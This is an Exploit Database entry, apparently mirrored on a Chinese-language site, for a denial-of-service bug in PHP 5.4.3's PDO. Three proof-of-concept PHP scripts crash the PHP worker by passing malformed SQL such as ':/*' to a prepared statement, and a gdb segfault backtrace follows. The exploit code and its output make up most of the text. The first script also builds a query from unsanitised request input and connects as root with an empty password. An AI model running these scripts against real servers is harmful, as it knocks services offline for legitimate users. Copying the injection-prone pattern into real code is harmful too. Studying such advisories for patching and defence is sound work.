PHP 5.4.3 – PDO Memory Access Violation Denial of Service

• Exploit Database
• 14 阅读

• 作者： 0x721427D8
  日期： 2012-08-02
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37566/

• source: https://www.securityfocus.com/bid/54777/info
  
  PHP is prone to a remote denial-of-service vulnerability.
  
  An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.
  
  PHP 5.4.3 is vulnerable; other versions may also be affected. 
  
  <?php
   try {
   $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
   //tokens: 
   // SELECT;*;from;'user';/*
   //$sql = "SELECT * from 'user'/*";
   $stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query']));
   $stmt->execute();
   //crash
   $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
   $stmt->fetch(PDO::FETCH_BOUND);
   print_r( $type);
   }
   catch (Exception $e)
   {
   echo "Failed: " . $e->getMessage();
   }
   ?>
   -----
   <?php
  try {
  $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
  
  //tokens:
  // SELECT;*;from;'user';/* 
  $sql = ":/*";
  
  $stmt = $db->prepare($sql);
  $stmt->execute(); // crashes php worker in pdo_parse_params()
  
  $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
  $stmt->fetch(PDO::FETCH_BOUND);
  print_r( $type);
  
  } catch (Exception $e) {
  echo "Failed: " . $e->getMessage();
  }
  
  ?>
  ---
  
  <pre>
  <?php
  echo "hmm beginning\n";
  try {
  $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
  echo "lets get it on\n";
  //tokens:
  // SELECT;*;from;'user';/* 
  $sql = "SELECT * from user :/**";
  echo $sql;
  $stmt = $db->prepare($sql);
  echo "prepared :)\n";
  print_r($stmt);
  $stmt->execute(); // crashes php worker in pdo_parse_params()
  print_r($stmt);
  echo "executed :(\n";
  $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
  $stmt->fetch(PDO::FETCH_BOUND);
  echo "--data-\n";
  print_r( $type);
  echo "--data--\n";
  
  } catch (Exception $e) {
  echo "EXCEPTION";
  echo "Failed: " . $e->getMessage();
  }
  echo "hmmm end\n";
  ?>
  </pre>
  
  Actual result:
  --------------
  root@bt:/opt/lampp# gdb ./bin/php 
  (gdb) run poc_pdo_linux_short_1.php
  Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php
  [Thread debugging using libthread_db enabled]
  
  Program received signal SIGSEGV, Segmentation fault.
  0x08228a81 in ?? ()
  (gdb) bt
  #00x08228a81 in ?? ()
  #10x082280eb in pdo_parse_params ()
  #20x08223891 in ?? ()
  #30x084b2aad in ?? ()
  #40x084b1f87 in execute ()
  #50x08490ed2 in zend_execute_scripts ()
  #60x0843f13c in php_execute_script ()
  #70x08506b46 in main ()